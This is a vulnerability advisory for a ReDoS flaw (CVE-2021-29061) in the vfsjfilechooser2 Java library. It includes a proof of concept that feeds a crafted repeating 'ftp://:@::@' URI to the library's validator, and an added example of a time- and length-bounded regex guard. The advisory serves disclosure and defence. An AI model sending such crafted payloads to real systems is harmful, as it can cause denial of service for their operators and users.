CVE-2021-29061
Package
vfsjfilechooser2
Overview
vfsjfilechooser2 is a mavenized fork of the dormant vfsjfilechooser project on sf.net.
Regular Expression Denial of Service (ReDoS) in Vfsjfilechooser2 version 0.2.9.
It allows a denial of service when crafted invalid URIs are validated.
Proof of Concept
import com.googlecode.vfsjfilechooser2.utils.VFSURIValidator;

public class Main {
    public static void main(String[] args) {
        VFSURIValidator v = new VFSURIValidator();
        String _uri = "ftp://:@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::";
        System.out.println(v.isValid(_uri));
    }
}
GitHub Commit
https://github.com/fracpete/vfsjfilechooser2/commit/9c9f2c317f3de5ece60a3ae28c371e9796e3909b
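A caller-side guard for code that has to run a backtracking regex validator on untrusted input, shown as an added example that is not code from vfsjfilechooser2 or from the linked commit. The class name, the helper `matchesWithin`, the length cap, the time budget and the sample pattern are all assumptions made for illustration; the pattern is a constructed one with nested quantifiers, not the library's own expression.

```java
import java.util.regex.Pattern;

public class BoundedRegex {
    static final class MatchTimeout extends RuntimeException {}

    /** CharSequence view that aborts matching once the deadline has passed. */
    static final class DeadlineCharSequence implements CharSequence {
        private final CharSequence inner;
        private final long deadline; // a System.nanoTime() value

        DeadlineCharSequence(CharSequence inner, long deadline) {
            this.inner = inner;
            this.deadline = deadline;
        }
        @Override public char charAt(int i) {
            // The regex engine reads input through charAt, also while backtracking,
            // so a runaway match hits this check and is cut off.
            if (System.nanoTime() - deadline > 0) throw new MatchTimeout();
            return inner.charAt(i);
        }
        @Override public int length() { return inner.length(); }
        @Override public CharSequence subSequence(int s, int e) {
            return new DeadlineCharSequence(inner.subSequence(s, e), deadline);
        }
        @Override public String toString() { return inner.toString(); }
    }

    /** Fails closed: oversize input or an exhausted time budget means "invalid". */
    static boolean matchesWithin(Pattern p, String input, int maxLen, long budgetMs) {
        if (input == null || input.length() > maxLen) return false;
        long deadline = System.nanoTime() + budgetMs * 1_000_000L;
        try {
            return p.matcher(new DeadlineCharSequence(input, deadline)).matches();
        } catch (MatchTimeout t) {
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed pattern with nested quantifiers; NOT the library's regex.
        Pattern p = Pattern.compile("^(a+)+$");
        String benign = "aaaa";                 // constructed input
        String slow = "a".repeat(40) + "!";     // constructed input, Java 11+
        System.out.println(matchesWithin(p, benign, 2048, 200));
        System.out.println(matchesWithin(p, slow, 2048, 200));
        System.out.println(matchesWithin(p, "a".repeat(5000), 2048, 200));
    }
}
```

The deadline is only checked when the engine reads a character, so the budget is approximate; the length cap is what keeps the worst case small before matching even starts.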